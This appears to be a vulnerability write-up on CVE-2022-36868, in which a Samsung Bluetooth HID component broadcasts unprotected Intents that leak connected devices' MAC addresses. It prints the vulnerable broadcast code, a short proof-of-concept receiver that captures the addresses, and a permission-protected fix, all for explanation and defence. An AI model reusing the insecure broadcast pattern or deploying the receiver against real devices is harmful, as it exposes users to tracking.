CVE-2022-36868 - Exposing MAC Addresses in MouseNKeyHidDevice – Details, Exploit, and Solutions

In late 2022, cybersecurity researchers uncovered a critical security flaw in the MouseNKeyHidDevice system on select Samsung devices. Catalogued as CVE-2022-36868, this vulnerability was due to the improper restriction of broadcasting Intents, which could cause the MAC address of connected Bluetooth devices to be leaked. In this post, we will explain what went wrong, how this could be exploited, and how you can stay safe.

What is MouseNKeyHidDevice?

MouseNKeyHidDevice is a system component found on some Samsung smartphones and tablets, managing the connection and interaction of external Bluetooth devices like mice and keyboards. Since Bluetooth devices use MAC addresses (unique identifiers for hardware), securing this information is important.

Cause: Improper restriction of broadcasting Intents.

- Effect: Any application (even without special permissions) can listen to broadcasts from MouseNKeyHidDevice and harvest the MAC address of connected Bluetooth devices.
- Impact: Attackers could use exposed MAC addresses for tracking, targeted attacks, or even exploiting other Bluetooth vulnerabilities.

This vulnerability existed in versions prior to Samsung’s Security Maintenance Release (SMR) for October 2022.

Code Example: How Was the Flaw Triggered?

Normally, Intents broadcasting sensitive data should either be sent as private or protected by permissions. Here, MouseNKeyHidDevice sent out a broadcast something like this:

// Vulnerable code simplified
Intent intent = new Intent();
intent.setAction("com.samsung.bluetooth.device.CONNECTED");
intent.putExtra("MAC_ADDRESS", bluetoothDevice.getAddress());
context.sendBroadcast(intent); // No permission check!

Anyone on the device could write

// Malicious app code
BroadcastReceiver receiver = new BroadcastReceiver() {
    public void onReceive(Context context, Intent intent) {
        String mac = intent.getStringExtra("MAC_ADDRESS");
        Log.d("StolenMac", "Leaked MAC: " + mac);
    }
};

IntentFilter filter = new IntentFilter("com.samsung.bluetooth.device.CONNECTED");
context.registerReceiver(receiver, filter);
// Now waits for MACs to be broadcast and captured

Takeaway: No app permission or user intervention was required — just an app waiting for the broadcast.

References

- Samsung Security Bulletin - SVE-2022-36868
- MITRE CVE Entry - CVE-2022-36868

Secure code would look like

Intent intent = new Intent();
intent.setAction("com.samsung.bluetooth.device.CONNECTED");
intent.putExtra("MAC_ADDRESS", bluetoothDevice.getAddress());
context.sendBroadcast(intent, "com.samsung.permission.BLUETOOTH_ADMIN"); // Permission required!

Conclusion

CVE-2022-36868 is a potent reminder that even minor coding mistakes — like improperly protected broadcasts — can have a big impact. While Samsung moved quickly to patch the issue, millions of phones might remain unpatched. Always keep your system updated and be cautious about the apps you install.

Stay safe, and keep your devices (and your privacy) protected!

*For further reading, check out the official Samsung release notes from October 2022, and follow updates about mobile vulnerabilities on MITRE CVE Database.*

Timeline

Published on: 10/07/2022 15:15:00 UTC
Last modified on: 10/11/2022 19:03:00 UTC